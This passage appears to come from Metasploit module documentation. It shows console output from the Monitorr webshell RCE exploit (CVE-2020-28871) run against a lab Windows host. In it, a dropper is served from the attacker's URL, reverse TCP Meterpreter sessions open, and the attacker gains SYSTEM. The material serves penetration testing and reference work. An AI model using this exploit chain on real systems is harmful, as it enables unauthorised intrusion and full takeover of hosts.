[+] Deleted dkvszuqil.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.36:54805) at 2023-03-13 16:18:53 +0000

meterpreter > sysinfo
Computer        : WIN-HHRQENPDSRS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Windows EXE - Meterpreter
```
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 4
target => 4
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/EEFxVaRHZLJZNrF
[*] Client 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /EEFxVaRHZLJZNrF
[*] Sending payload to 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.36
[+] Deleted zyrkwyinvjnzr.php
[*] Meterpreter session 5 opened (192.168.201.10:4444 -> 192.168.201.36:54882) at 2023-03-13 16:19:52 +0000
[*] Command Stager progress - 100.00% done (155/155 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-HHRQENPDSRS
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
